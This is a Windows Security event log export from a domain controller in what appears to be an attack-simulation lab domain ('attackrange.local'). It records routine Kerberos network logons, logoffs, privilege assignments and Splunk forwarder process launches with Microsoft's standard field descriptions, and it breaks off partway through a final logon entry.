The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:42:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264013
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x79C814
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:42:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264012
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x79C7A8
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:42:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264011
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x79C7A8
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 51750
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:42:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264010
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x79C7A8
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:42:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264018
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x79D542
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:42:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264017
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x79D542
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 51760
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:42:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264016
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x79D542
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:43:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264019
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1820
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:43:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264021
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1bdc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:43:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264020
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x17f8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:43:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264022
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1a30
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:43:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264023
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xd9c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:43:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264025
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x103c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:43:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264024
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x19c8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:43:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264028
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7A10A1
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:43:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264027
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7A10A1
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 51773
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:43:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264026
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7A10A1
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:44:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264039
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7A1504
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:44:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264038
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7A15F2
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:44:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264037
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7A163A
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:44:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264036
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Delegation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7A16AE
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {271648EC-6A60-17D5-CF0E-2D75C946746E}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 51778
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:44:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264035
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7A16AE
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:44:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264034
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7A163A
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 10.0.1.14
Source Port: 51777
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:44:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264033
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7A163A
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:44:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264032
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7A15F2
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 0
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:44:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264031
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7A15F2
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:44:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
